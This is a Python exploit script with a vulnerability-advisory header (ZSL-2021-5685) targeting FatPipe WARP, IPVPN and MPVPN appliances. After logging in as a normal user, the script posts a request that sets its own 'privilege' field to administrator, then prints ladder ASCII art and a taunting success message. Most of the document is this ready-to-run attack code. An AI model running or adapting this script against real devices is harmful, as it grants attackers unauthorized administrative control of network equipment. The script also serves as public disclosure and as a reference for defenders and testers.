#!/usr/bin/env python3 # # # FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation # # # Vendor: FatPipe Networks Inc. # Product web page: https://www.fatpipeinc.com # Affected version: WARP / IPVPN / MPVPN # 10.2.2r38 # 10.2.2r25 # 10.2.2r10 # 10.1.2r60p82 # 10.1.2r60p71 # 10.1.2r60p65 # 10.1.2r60p58s1 # 10.1.2r60p58 # 10.1.2r60p55 # 10.1.2r60p45 # 10.1.2r60p35 # 10.1.2r60p32 # 10.1.2r60p13 # 10.1.2r60p10 # 9.1.2r185 # 9.1.2r180p2 # 9.1.2r165 # 9.1.2r164p5 # 9.1.2r164p4 # 9.1.2r164 # 9.1.2r161p26 # 9.1.2r161p20 # 9.1.2r161p17 # 9.1.2r161p16 # 9.1.2r161p12 # 9.1.2r161p3 # 9.1.2r161p2 # 9.1.2r156 # 9.1.2r150 # 9.1.2r144 # 9.1.2r129 # 7.1.2r39 # 6.1.2r70p75-m # 6.1.2r70p45-m # 6.1.2r70p26 # 5.2.0r34 # # Summary: FatPipe Networks invented the concept of router-clustering, # which provides the highest level of reliability, redundancy, and speed # of Internet traffic for Business Continuity and communications. FatPipe # WARP achieves fault tolerance for companies by creating an easy method # of combining two or more Internet connections of any kind over multiple # ISPs. FatPipe utilizes all paths when the lines are up and running, # dynamically balancing traffic over the multiple lines, and intelligently # failing over inbound and outbound IP traffic when ISP services and/or # components fail. # # FatPipe IPVPN balances load and provides reliability among multiple # managed and CPE based VPNs as well as dedicated private networks. FatPipe # IPVPN can also provide you an easy low-cost migration path from private # line, Frame or Point-to-Point networks. You can aggregate multiple private, # MPLS and public networks without additional equipment at the provider's # site. # # FatPipe MPVPN, a patented router clustering device, is an essential part # of Disaster Recovery and Business Continuity Planning for Virtual Private # Network (VPN) connectivity. It makes any VPN up to 900% more secure and # 300% times more reliable, redundant and faster. MPVPN can take WANs with # an uptime of 99.5% or less and make them 99.999988% or higher, providing # a virtually infallible WAN. MPVPN dynamically balances load over multiple # lines and ISPs without the need for BGP programming. MPVPN aggregates up # to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed # you need to keep your VPN up and running despite failures of service, line, # software, or hardware. # # Desc: The application suffers from a privilege escalation vulnerability. # A normal user (group USER, 0) can elevate her privileges by sending a HTTP # POST request and setting the JSON parameter 'privilege' to integer value # '1' gaining administrative rights (group ADMINISTRATOR, 1). # # Tested on: Apache-Coyote/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5685 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php # # # 30.05.2016 # 25.07.2021 # # import sys import time####### import requests################ requests.packages.urllib3.disable_warnings() if len(sys.argv) !=2: print print("********************************************************") print("* *") print("* Privilege escalation from USER to ADMINISTRATOR role *") print("* in *") print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") print("* *") print("* ZSL-2021-5685 *") print("* *") print("********************************************************") print("\n[POR] Usage: ./escalator.py [IP]") sys.exit() ajpi=sys.argv[1] print juzer=raw_input("[UNE] Username: ") pasvord=raw_input("[UNE] Password: ") sesija=requests.session() logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', 'Accept' :'application/json, text/javascript, */*; q=0.01', 'X-Requested-With':'XMLHttpRequest', 'Sec-Ch-Ua-Mobile':'?0', 'User-Agent' :'Fatnet/1.b', 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', 'Origin' :'https://'+ajpi, 'Sec-Fetch-Site' :'same-origin', 'Sec-Fetch-Mode' :'cors', 'Sec-Fetch-Dest' :'empty', 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', 'Accept-Encoding' :'gzip, deflate', 'Accept-Language' :'en-US,en;q=0.9', 'Connection' :'close'} juarel1='https://'+ajpi+'/fpui/loginServlet' alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) if not 'success' in alo.text: print('[GRE] Login error.') sys.exit() else: print('[POR] Authentication successful.') print('[POR] Climbing the ladder...') sluba=''' || || .--._ ||====|| __ '---._) || ||"")\ Q Q ) ||====|| =_/ o / || || | \_.-;-'-,._ ||====|| | ' o---o ) || || \ /H __H\ / ||====|| '-' \"")\/ | || || _ |_='-)_/ ||====|| / '. ) || || / / ||====|| |___/\| / || || |_| | | ||====|| / ) \\ \\ || || (__/ \___\\ ||====|| \_\\ || || / ) ||====|| (__/ ''' for k in sluba: sys.stdout.write(k) sys.stdout.flush() time.sleep(0.01) juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' posta={ 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' } stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) if not 'true' in stanje.text: print('\n[GRE] Something\'s fishy!') sys.exit() else: print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') sys.exit()